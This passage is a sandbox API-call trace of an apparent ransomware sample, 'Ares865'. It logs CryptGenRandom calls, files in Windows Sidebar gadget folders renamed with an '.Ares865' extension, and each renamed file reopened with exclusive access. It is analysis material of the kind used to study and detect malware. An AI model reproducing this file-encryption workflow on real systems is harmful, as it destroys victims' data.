(lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\js\\cpu.js.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\js\\cpu.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.778] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=18348) returned 1 [0118.779] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.779] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.779] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.782] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.783] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.783] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.784] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css" [0118.784] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css.Ares865") returned 83 [0118.784] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\cpu.css"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\cpu.css.ares865"), dwFlags=0x1) returned 1 [0118.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\cpu.css.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\css\\cpu.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.786] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1372) returned 1 [0118.786] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.787] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.787] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.789] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.789] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.789] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.790] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget" [0118.790] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.Ares865") returned 76 [0118.790] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\drag.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\drag.png.ares865"), dwFlags=0x1) returned 1 [0118.792] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\drag.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\drag.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.792] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23429) returned 1 [0118.793] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.793] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.793] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.796] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.797] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.797] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.798] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.Ares865") returned 76 [0118.798] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\icon.png.ares865"), dwFlags=0x1) returned 1 [0118.799] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.800] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11788) returned 1 [0118.800] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.801] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.801] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.803] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.804] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.804] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.804] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.Ares865") returned 76 [0118.804] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\logo.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\logo.png.ares865"), dwFlags=0x1) returned 1 [0118.806] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\logo.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.806] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6166) returned 1 [0118.806] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.807] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.807] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.809] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.810] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.810] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.810] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images") returned="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images" [0118.811] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.Ares865") returned 89 [0118.811] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png.ares865"), dwFlags=0x1) returned 1 [0118.815] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.815] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25904) returned 1 [0118.815] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.816] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.816] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.819] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.819] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.819] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.820] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.Ares865") returned 93 [0118.820] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png.ares865"), dwFlags=0x1) returned 1 [0118.822] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.822] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=306) returned 1 [0118.822] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.823] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.823] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.826] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.827] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.827] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.827] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.Ares865") returned 91 [0118.827] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png.ares865"), dwFlags=0x1) returned 1 [0118.829] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.829] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=381) returned 1 [0118.829] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.830] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.830] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.832] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.833] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.833] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.833] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.Ares865") returned 91 [0118.833] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png.ares865"), dwFlags=0x1) returned 1 [0118.835] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.835] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=434) returned 1 [0118.836] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.836] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.836] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.839] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.840] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.840] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.840] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.Ares865") returned 91 [0118.840] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png.ares865"), dwFlags=0x1) returned 1 [0118.841] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.842] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3171) returned 1 [0118.842] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.842] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.843] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.845] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.846] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.846] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.846] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.Ares865") returned 98 [0118.846] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png.ares865"), dwFlags=0x1) returned 1 [0118.848] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\cronometer_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\cronometer_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.848] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29780) returned 1 [0118.848] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.849] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.849] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.852] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.853] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.853] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.Ares865") returned 84 [0118.854] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png.ares865"), dwFlags=0x1) returned 1 [0118.855] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.855] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=30641) returned 1 [0118.856] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.856] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.856] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.859] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.860] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.860] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.861] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png.Ares865") returned 88 [0118.861] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png.ares865"), dwFlags=0x1) returned 1 [0118.863] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2944) returned 1 [0118.863] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.864] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.864] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.866] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.867] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.867] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.867] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png.Ares865") returned 86 [0118.867] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_h.png.ares865"), dwFlags=0x1) returned 1 [0118.869] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\diner_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\diner_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.869] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 